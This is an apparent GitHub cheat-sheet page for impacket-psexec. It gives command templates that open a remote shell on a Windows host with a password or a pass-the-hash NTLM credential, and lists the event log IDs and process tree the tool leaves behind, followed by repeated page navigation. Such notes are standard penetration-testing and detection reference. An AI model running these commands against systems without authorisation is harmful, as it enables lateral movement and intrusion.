Source

https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py

Open shell on remote host

impacket-psexec <domain>/<user>:<password>@<rhost>

Using hash (hash must be: lmhash:nthash)

impacket-psexec -hashes :<ntlmhash> <domain>/<user>@<rhost>

Opsec considerations

upload randomly named exe file to C:\Windows

Windows Security Log Event IDs
-Logon (4624) -> multiple
-Special Logon (4672) -> multiple
-A service was installed in the system (4697) 

Windows System Logs
-Service Control Manager (7045)

Running processes

gsHtpykm.exe
└── cmd.exe
    └── Conhost.exe

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

impacket-psexec.md

impacket-psexec.md

Source

Open shell on remote host

Using hash (hash must be: lmhash:nthash)

Opsec considerations

Running processes

Files

impacket-psexec.md

Latest commit

History

impacket-psexec.md

File metadata and controls

Source

Open shell on remote host

Using hash (hash must be: lmhash:nthash)

Opsec considerations

Running processes